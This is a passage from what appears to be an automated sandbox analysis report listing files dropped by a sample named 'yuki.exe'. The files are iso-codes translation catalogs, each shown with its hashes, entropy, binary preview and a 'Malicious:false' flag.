                                                                                                    SSDEEP:384:Agho/nc0xIJ7vO73DR6Tp0FnOpbV8jq5wsOP4XLAE1i3Kak2rlR01UnsF:ec5G5G08h++msOP4XLAEWnrk1Z
                                                                                                    MD5:0B85F64B96FB4E68E23FC2AF6216E3BF
                                                                                                    SHA1:C99CE0A6234B8D33F75ED93C29CDE0C727F87B3B
                                                                                                    SHA-256:79861DBDBD339EBBA8F5E02F9816E700564C4CD7EF6FCB2F457F79ABE7ECEA78
                                                                                                    SHA-512:1463D1B5ADE4F4E6F8059806AF895DA8C2475855412C420407C1FA0B0AD7D75D6A6475F4015D5B7490814B9D63A18660CA815B956876DB714640A703EF37EEBF
                                                                                                    Malicious:false
                                                                                                    Preview:....................#............"......."......%"......-"......5"......D"......L"......S"......\"......g"......{".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......##.. ...*#......K#......S#.. ...s#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$....../$......8$......A$......H$......W$......p$......u$......{$.......$.......$.......$.......$.......$..,....$.......%.......%..%...#%......I%......V%......a%......i%......n%......w%......~%.......%..%....%..,....%.."....%..*....&......=&......E&......N&......W&......j&.......&.......&.......&.......&.......&.......&.......&.......&.......&..'....&..$....'......B'......^'......z'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......5(......=(......E(......K(......U(......o(......v(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(..!....(.......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 44 messages, Project-Id-Version: iso_3166-2 'Sam\303\263 Meirice\303\241nach'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2380
                                                                                                    Entropy (8bit):5.013878498548355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:mMXfJiDjXTmkbhNp9cGx9aazx/UiMvxFoEeYQDB2ed:mKfoZ1/N/JwxFAYled
                                                                                                    MD5:ABD75C9A131F5609F0B47EBB88CC9406
                                                                                                    SHA1:E090B40AFA3C518E10D0D0B6E50B5197E58754BB
                                                                                                    SHA-256:1DAB75233392A0376E60C959D1562A4F2EB1596E1CB52302CC537FD880E4707A
                                                                                                    SHA-512:7B45D006FEF3E1B00096F84B2ABFA69211AB0BAB3AFCEF381EA276614A6D6D701D9ABF1B4690B00C869982518810E84A3A6119FF01ED13634CEB23FE7D7E5F72
                                                                                                    Malicious:false
                                                                                                    Preview:........,.......|...;...................................................................................................................%.......-.......8.......=.......G.......M.......U.......^.......d.......l.......u.......~...........................................................................................................$...................(.......2.......:.......B.......H.......Q.......e.......k.......w...............................................................................................................................%.......+.......4.......>.......J.......N.......U.......`.......i.......q.......~.......................................................................................&.......2.......B...........)...........(.......%.......................................*...............................+...........&...,...................................$...........'... ...!.......................#..................................."....American Samoa.Aruba.Belize.Car
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Cr\303\255ocha Briotanacha na hAntartaice'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2691
                                                                                                    Entropy (8bit):5.194083617526417
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADmryUFluvGqIfdvqNuoUnSz6VKT5dMRNtO:qD3UFUyBooc65Y
                                                                                                    MD5:F1E1D9F25C7AAEBF091FDE4E26FB0A35
                                                                                                    SHA1:73B2E9C83B39C4196B4B1597AC7F01F13BAF8C39
                                                                                                    SHA-256:2CDB8395988FDA44F7C989CE0EC0159B96C3E0F8EE0B6552CEDB86A244B344FF
                                                                                                    SHA-512:9A1EB35AB1636F1825E34AB5314BF3B895387771F03AA5F12E64BB1AF14694B2AB16D2A6DECF2745EBF9531B978A9402C8C30590BA0514654EBB1F06D1DF8CC1
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........o.......#.......'...=...1...e...........'.......................................*...'..."...R...#...u...................................................1...........?.......U.......u.......|...5.......1...........................2.../...?.......o........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 71 messages, Project-Id-Version: iso_4217 'Afgain\303\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4140
                                                                                                    Entropy (8bit):4.949671337229051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:WGhdROouqVK+WrBPhe7gXjLskkE3SId3cpOmUqzFFU5qwipPhNS7mDWI2dnYu3ok:WaRRgLf8HpOmFzQGpcYu3oun3
                                                                                                    MD5:2084D83E7BAB602207E62D3582B263DB
                                                                                                    SHA1:BE4D158629D06FAA048698DB21ADE137D5FCB686
                                                                                                    SHA-256:4500D255ED9FB1442B6C5172550360A99625CE2EED2ADD27964D33FF4AF99FC7
                                                                                                    SHA-512:3636BD2D4A662EA8986AAE9FA236640DF4770B3EA895E999C78838E5E25CDFC172E24F43BB789C4B2CB2D10359BCBC4084DADB373AD802B7BEFD08A92C81828D
                                                                                                    Malicious:false
                                                                                                    Preview:........G.......T...a...................................(.......7.......E.......W.......g.......v...............................................................................................%.......4.......F.......Q.......^.......m.......|.......................................................................................................'.......7.......G.......U.......d.......t...............................................................................................2.......>.......O.......V.......g.......~...........................................................................Z...........o.......x...............................................................................1.......B.......T.......d.......s.......}...............................................................................%.......:.......L.......Q.......`.......s.......w...............................................................................".......5.......C.......U.......n.......}...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 202 messages, Project-Id-Version: iso_639-3 'Abc\303\241isis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8814
                                                                                                    Entropy (8bit):4.757207525383754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:VrhHoTyutjum1enAe4sGqZML47l3IOw1uZoQ4ct6OQiNfC:ZVo+BKuL4sGoML474gm3coniNK
                                                                                                    MD5:8FA90598BC96919B85D02C03D7785753
                                                                                                    SHA1:F1E16B4E15BA1ABBFDBC79979297AD3DBE857B86
                                                                                                    SHA-256:A7F7382B151CB155D0C7DA453DFD507DCF8FDD2AED0D546A77B5805D648774DC
                                                                                                    SHA-512:A6C4AB649CE8EC6E3A2B25646E0040B5B5ECCC9E6E76DAE98AE7D160C08C3083F74EC0542CDAD94F3D19CEDD0FBCCEE994EF79C62AD4AEC6998F93C2D245BDE0
                                                                                                    Malicious:false
                                                                                                    Preview:................l.......................................................................!.......'......./.......6.......@.......I.......R.......Y.......a.......h.......t.......|.......................................................................................................................................................".......'.......0.......6.......=.......C.......L......._.......g.......o.......................................................................................................................................&...............7.......=.......F.......M.......T......._.......e.......o.......w...........................:...........................................................'......./.......8.......A.......I.......P.......\.......e.......n.......x.......................................................................................................................................................................$.......,.......3.......<.......A.......G.......O.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5761
                                                                                                    Entropy (8bit):5.031162986892688
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5IFWYXx5O89kjFbEylUyA6eMBDG7sT/TLBwpoikd6bWLy:iIJb0FbEKtxd2fSSd
                                                                                                    MD5:E734425EF4E75F262CA2CEB13FD21F98
                                                                                                    SHA1:27603E43B0EC1F635F54CAE013CAFF5AC643C29F
                                                                                                    SHA-256:269CCCEEAD3D14F1032A1D87418764B9749D44DC0581D9F931A08A568ACFF93B
                                                                                                    SHA-512:14E65DF5EB6E576B56B4AE3B7471115099D494148D7C7879C43858C24CB603F9F2B68C5FC6FC61BE02EAF0296726AF247E85E5A3BD65312D7AD5B5CC9B28A9A9
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................M...................%.......5.......B.......U.......e.......{.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265\341\215\241\341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):476
                                                                                                    Entropy (8bit):5.404193692215078
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i361xjt02UkLKcG/Ki4FLwPvXmBQWihpzl:Mm5t0UPKKzF4vXm2
                                                                                                    MD5:2F292856C0A4BC0D6E9EEDB521DB7CF6
                                                                                                    SHA1:C402EEB483EFDDC0505CA31A1BF4E32BACC2D674
                                                                                                    SHA-256:CE1234C4C9DD423DC09F7DC0D64C00F4187EBB680F057DEE623D0C361D4D86A8
                                                                                                    SHA-512:EC5FAECD3DD513B06694031409EF500B28C323250BDFA47564533831A285EF8BCE60018278C9B65B3F186CBC7A78E089505CF9563FDDB27CC47BE12143706204
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...M...f...'............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Geez.Language: gez.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 121 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5696
                                                                                                    Entropy (8bit):4.868155374625738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kGQGu8IdRxHKv4zEyCrG+Kbpy95Mon/2pL5lsx2OrtZFdjVoEP0GCuk:k0u8/4zEbG+KU9qhlIkOrtZrjnMuk
                                                                                                    MD5:AFCF97F6AB1379D39A3C7EE22CE7B42E
                                                                                                    SHA1:D720FDA777D9A551808CC70DFE5B4AC774D1F68D
                                                                                                    SHA-256:D1F6261B63CD376DF083CB6070EE275452976F9B2C348566D170AF85C4B7DDF7
                                                                                                    SHA-512:3262FB2807094FF66FF3E2446A1324C281E288E09D5E7746DF8FE2C1A2FE38D1E3B8565D7B9A9B678C712F6FA8F591D8B4FC34AC6FD2665EFCAF4A03110BB2C9
                                                                                                    Malicious:false
                                                                                                    Preview:........y.......................8.......9.......C.......H.......R.......[.......c.......j.......s.......|...............................................................................................................................................................".......+.......3.......:.......B.......I.......N.......W.......^.......f.......o.......u.......|...............................................................................................................................................................$.......,.......4.......?.......J.......S.......].......e.......k.......s.......}.......................................................................................................................................................................&.......0.......6.......>.......F.......L.......R.......X......._.......d.......l.......r.......{...................................................................................................................................I...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 145 messages, Project-Id-Version: iso_15924 '\303\201rabe'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8054
                                                                                                    Entropy (8bit):5.019187554339782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:AGUVlNGtbut4ndjaSa5pCVqTOe3NKg7JwWnJl:AlNGhU4djVa5pC693NKg7LJl
                                                                                                    MD5:225283C89E93310008E0746A1077ACE4
                                                                                                    SHA1:CACEB64ED03F78E38D585E99CB3AE5F812CDBF66
                                                                                                    SHA-256:E414A488BABF5AD3271A74C915E2EA9B0C22F30675B1A92865A6F062F54070B9
                                                                                                    SHA-512:AB29863DFE13FF28E4D1B49F49A885A109CD6AD32562671DA483CF854D3D53C38DCC973E3D92C59F143A39F1840121159E89A998D08263CB6B5E8B2AFBFB244E
                                                                                                    Malicious:false
                                                                                                    Preview:........................,.......0.......1.......8.......A.......I.......R.......X.......b.......h.......p.......|...............................................................................................................!.......>.......E.......`.......h...&...q...................(...........................................&.......8.......M.......X......._.......g.......m.......v...............................................................................+.......A.......X...........................................................#.................................................../.......F.......U.......[.......d.......m.......{...........................................................................................(...&.......O.......a...-...k...........................#.......".......)...........#...............:.......L.......e.......k.......s................................................... ...................................#.......*.......5.......D.......P.......X.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 411 messages, Project-Id-Version: iso_3166-1 'Afganist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23252
                                                                                                    Entropy (8bit):5.033212110678132
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:RWN886/5rK1sGK+JfP06krPW8jh5wsOP4XLAE1i3K90YApZA6tl+V:af26krtmsOP4XLAE50YApZA6tlu
                                                                                                    MD5:A7FA02CD5A2CE36B38E4202C840E0606
                                                                                                    SHA1:418979231AE5F57EA6813D72D7439375816B5F31
                                                                                                    SHA-256:3CEAB07341AE7B363E6917180EEC8AFF483D301069070059CF6AD7D401A355CD
                                                                                                    SHA-512:A3E689B9179474BE6DD5CD29D54BD06DCB57FE6D3D47632D3DA1AB43806065806E04A436B016AEEA110BD9F6ABF68056B6467A32D79B1AB5A36995182FA10DC1
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......%#....../#......7#......B#......J#......R#......]#......f#......n#......v#......}#.......#.......#.. ....#.......#.......#.. ....#.......#.......$.......$......*$......1$......P$......g$......y$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%......4%..,...P%......}%.......%..%....%.......%.......%.......%.......%.......%.......%.......%.......%.......%..%....&..,...2&.."..._&..*....&.......&.......&.......&.......&.......&.......&.......&.......'.......'......"'......*'......2'......;'......D'......`'..'...n'..$....'.......'.......'.......'.......(.......(......L(......Q(......Y(......`(......n(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......).......)......()......-)......7)......@)......G)......U)......\)......b)..!...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territorio Brit\303\241nico da Ant\303\241rtida'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2695
                                                                                                    Entropy (8bit):5.184723605369333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD76UrOxEJuvGqIfdvqNuoUWtzIYWiQM7carjwQtXQu:qD+JyBo5zI7lg1r6u
                                                                                                    MD5:B3D91A5C4CFBD76E5C605D0AE8FC5CC4
                                                                                                    SHA1:E39ABE3D79CF06ABCEF43524C540BAD837A11043
                                                                                                    SHA-256:DEB32CD34B82090BE1EEC473DA562C25753CCAA9912F11D35AD49832DF148958
                                                                                                    SHA-512:E3BD9972EE049BD8592C10753BAB35CB25E610EC75900DDC4AED1EA75F645CFFC37D69F7FF87CCB10C46AE664122DD52E1919BFFCFD336510C24180D8CB7DD33
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................#...P...)...t...0...............(.........................../.......;...)...Q...,...{...#...................................................".......2.......a.......z...................".......3...............$...........>...)...H.......r........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 46 messages, Project-Id-Version: iso_4217 'Dinar alxeriano'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2840
                                                                                                    Entropy (8bit):4.926681586145203
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rxiE3V2tWupFYygVnq3XTqSqxSMPmUsDgchZlAEuj7:1iW2EVerEm9Drqj7
                                                                                                    MD5:5EB87ACF09C966E470D2E21BD15FA6BA
                                                                                                    SHA1:96DB3DF6A56919D2C6573D8093347B6F921EB96B
                                                                                                    SHA-256:2B8F41A5F359F0FAEB89C9372393566C3A1DD2B60007F924EE5D26ADF005E041
                                                                                                    SHA-512:19F93D8298A454F1EEE677DE9B703D60A479677A8E6021B19C23FFB9A4413974A56767ACCD3687089212D20B4EEC35A780C5D393450CE1EE28E391E1E9F10B34
                                                                                                    Malicious:false
                                                                                                    Preview:....................=...........................................".......1.......A.......O.......`.......n.......|....................................................................................... ...............?.......L.......Y.......e.......u...............................................................................................0.......<.......I.......d.......s.......~...........j...........................'.......:.......K......._.......p.......................................................................................).......7.......G.......Z.......l...............................................................................................+.......A.......`.......p...................................................................................-...*...........................(...)...........................%...........................+...................!....... ...#...........................................................,...$...............&......."...'...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7322 messages, Project-Id-Version: iso_639-3 'Are are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):306888
                                                                                                    Entropy (8bit):5.219978031434053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:7qnUsK0a7mjj8B2ArVyu2m17eHPke9BLDey3hZElc6tkiicXZk6lcHpsDT466irq:eUsKX4u2NB5ygzSBoj
                                                                                                    MD5:16FCE63105A2AEB9E3F1E8D854977CC8
                                                                                                    SHA1:A0B78420C104ED582AD56F9CE7CA2201138B44C7
                                                                                                    SHA-256:275A79ECC9DD21D78885BD92264D2AB4C104B0327FDD7B3E4D5870A7C3018A91
                                                                                                    SHA-512:482020AB7C4B558DA123C89550B78AF63A1ADE0335864385F9EC9782630FF66E60C43723A9B840F405C806CB0EB3A42DD5A91E061855627BB6E1001E91D70212
                                                                                                    Malicious:false
                                                                                                    Preview:....................'&..........Xb......Yb......bb......lb......wb......|b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......c.......c.......c.......c.......c.......c.......c......%c......-c......2c......:c......Ac......Fc......Nc......Sc......\c......hc......wc.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......d.......d.......d.......d......!d......&d......-d......5d......9d......?d......Dd......Yd......`d......id......sd......{d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......e.......e......*e......:e......Je......Xe......me.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......f.......f.......f.......f......!f.......f......4f......<f......Bf......Pf......_f......pf......|f.......f......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 'Albania'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8952
                                                                                                    Entropy (8bit):4.697165941272806
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:FQghohsykNNlJAGCqL6YLhBDFWmh/aRzug090A/aRzugY9F:Ft0HCXAG3/vVaNugU0uaNugoF
                                                                                                    MD5:BBE1C0CC95E8836BBDC5EEC9CDE56DCB
                                                                                                    SHA1:369342C6D918E82F5238A27CCDF4BD224BE1DCD2
                                                                                                    SHA-256:71F54B6278CE69B1BB049027532B6534517C817EA85059861E282A4867971D8F
                                                                                                    SHA-512:F31DA9C1D8F18A7A22E39DA80AA558D9C8C55EE4360CD889AF378C53DBB774CFA455C6D0790C1279A9AD4C5ABAE340ADBC45539A9E5E4E164F39A959BF07DE7A
                                                                                                    Malicious:false
                                                                                                    Preview:........................,...............................................................................................................................................#.......,.......4.......<.......C.......I.......Q.......X.......`.......i.......w.......~.......................................................................................................$.......5.......M.......V.......^.......k.......v.......~.......................................................................................................................................*......./.......7.......>.......L.......].......y.......................................................................................................................................................................'.......-.......7.......<.......D.......P.......W.......].......e.......k.......r.......y...............................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\340\252\205\340\252\253\340\252\230\340\252\276\340\252\250\340\252\277\340\252\270\340\253\215\340\252\244\340\252\276\340\252\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35101
                                                                                                    Entropy (8bit):4.966255659030273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRvMlzmwZbjh5wsWP4XWAIziUGChXCmoOhQvl8h7qU6hBElv/r9r1Y8:sxJOzmotmsWP4XWAIyg2ClY0SgqW
                                                                                                    MD5:CD52232DF976CB917D0560E644DD7D7A
                                                                                                    SHA1:CB8A906E103BCB64A2240076178A03C5FD37AD9A
                                                                                                    SHA-256:0536C80E3728A681A5F9BAB95ED995DFA8C884C227D5D15BA3EDFAA1058F1FBE
                                                                                                    SHA-512:4E4627BA7C7541EBAD17C163B40E44D065DEC6F073E800F2DF548ECC643CF50C77911E30B66DA5275C342B912921D24787EC91BCFE488395E1E40CC54F1E6948
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\252\254\340\253\215\340\252\260\340\252\277\340\252\237\340\252\277\340\252\266 \340\252\217\340\252\250\340\253\215\340\252\237\340\252\276\340\252\260\340\253\215\340\252\237\340\252\277\340\252\225 \340\252\237\340\253\207\340\252\260\340\253\200\340\252\237\340\252\260\340\253\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3904
                                                                                                    Entropy (8bit):5.16103567070982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDTpFIyBodV9zH0e8Ldf0GodOcn/I7d0m00L:qDTEh0eKdf0G+OcQx0m0E
                                                                                                    MD5:2C68501A0FA1E6CFA235C84441CCFCEB
                                                                                                    SHA1:215E9D7D5679DC2645D6507B04CC50632FA42DF3
                                                                                                    SHA-256:B2989A542047A3B052BA71B5AE082604C0CECEC26CC75E495B37C4748C4DCAC2
                                                                                                    SHA-512:80D8C0C3A4FA8FA504A13582B7B4E852A8AE96A6E13DD401F1FC7C21CDB33A1F78E0B9CA10F5A0219EE1FA52E96048B4B23A9B01582478BA131D3876BC388C33
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................J...a...Q...............K...~...............P...;...f...........;.......B.......j...>...J.......E...........:.......Z...=...z...%.......(.......P.......2...X...A.......................B...........U...B.......X... .......y...........)............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 867 messages, Project-Id-Version: iso_639-3 '\340\252\206\340\252\270\340\252\276\340\252\225\340\253\215\340\252\267'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):44025
                                                                                                    Entropy (8bit):4.911571536908672
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:lL7e/Fx4xyyuuJhPrHkVzH3GoATzsCdF3IQEL03kEKyr+wpYaHrf:l7OFVyvv7oGoUJF3IQjJn
                                                                                                    MD5:78932043142E9B9061BCED1C50F2EBD8
                                                                                                    SHA1:07D985A38C821FC4A92FD916F5F8ABC053CE4EBC
                                                                                                    SHA-256:A763CAB2C3094D84CE6225F9B86F72C13CB1D91A40E230B12BC661D12D8C701B
                                                                                                    SHA-512:F7C212BDDC24F91F2378DF170D4763CCF4C589BBE03031074C1E8D31DC0C8765F4791DDBD25B5C0FEEDE638763C354D18B6CE716CB43D896A7624E187F371391
                                                                                                    Malicious:false
                                                                                                    Preview:........c.......4.......L6......xH......yH.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......I.......I.......I.......I.......I.......I......#I......(I......=I......FI......PI......VI......_I......hI......mI......wI.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......J.......J.......J.......J......$J......=J......MJ......ZJ......iJ......wJ.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......K......!K......*K......-K......5K......<K......DK......KK......PK......VK......]K......jK......vK......{K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......L.......L.......L......%L......-L......4L......<L......AL......GL......OL......UL......ZL......`L......gL......mL......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 191 messages, Project-Id-Version: iso_3166-1 'Yn Afghanistaan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8982
                                                                                                    Entropy (8bit):4.829738009586998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:28vYOpWtg+YuNTxzugsqbwz97QKY2nTRNv3D4u:TBpFuBtugsqbwp7q2TRhT5
                                                                                                    MD5:9BE103E398A667CC448C5F8DC44289D1
                                                                                                    SHA1:FB26F7232BBC88B40FF07B75F131EE1F61A863B5
                                                                                                    SHA-256:F2B11854A10F655481E121B2356BB402B9CC22213E158F4C17F2C78375557E9D
                                                                                                    SHA-512:9033B2D42F86C5A15D656332E8004833E8338F69E77463EBBB9106FD661691DC9E09E0C96C49A12F8FE5656D9DC7A9A624CD762FC10619A99AA47ECE61705C68
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................%.......-.......5.......<.......P.......Z.......b.......l.......t.......................................................................................................................................................&.......-.......F.......K.......Q.......i.......r.......z............................................................................................................................... .......?.......D.......L.......S.......Y.......a.......i.......o.......y...................................................................!...........................................................................+.......2.......8.......@.......F.......M.......T......._.......e.......n.......u...............................................................................................................................................................".......+.......6.......>.......I.......Q.......Y......._.......e.......q.......}.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 119 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5135
                                                                                                    Entropy (8bit):4.632367543056903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Y7H7fCrwwBaeBLKu9Xiuyz89uEWbfyIwe4KX9HuF6uJ:GH76rwwFNKuB/yz89GqY4KFcZ
                                                                                                    MD5:7687A60B4ACD432190F41A9980C5B778
                                                                                                    SHA1:6186EF1002B3B06C8CA3BC09B1227D6F96FC3D66
                                                                                                    SHA-256:4E71C2FFB54310BC0725CE1DFD661CC738201A174794515E92FAB637E32CEB28
                                                                                                    SHA-512:15256E94F46683BE5F9394083EE77CC1642BC8E4B7AEAC7174ADBD01CBD856F73801246A04D931080AD35151CF47783EE009FB402B8D76761ECEB024DBB5C66B
                                                                                                    Malicious:false
                                                                                                    Preview:........w.......................................%.......-.......5.......=.......D.......N.......V.......`.......h.......s.......{.......................................................................................................................................................#.......2.......:.......C.......K.......Q.......Z.......b.......i.......q.......y.......................................................................................................................................................................!.......(.......0.......6.......D.......N.......Y.......b.......k.......p.......v...............................................................................................................................................................'.......2.......?.......G.......N.......X.......a.......j.......r...............................................................................................................................%.......-.......3.......B...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 20 messages, Project-Id-Version: iso_3166-1 'Belarusa'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1305
                                                                                                    Entropy (8bit):5.105510594236593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cx3mTSHZxCiMlp2K4tN8jt0UGdg/pXmGRqhYpGwAWOoaLol:cx2EZxklpd4tCyUHMnhWN
                                                                                                    MD5:106B7241F086065157C3E8635AD86D19
                                                                                                    SHA1:8C6FAFF3C14462286E9917D959D194F97E2D1F04
                                                                                                    SHA-256:891730A8355BDA30D21DFE47D4F616992FF49D6BEFDA0F3576923473EC51A77D
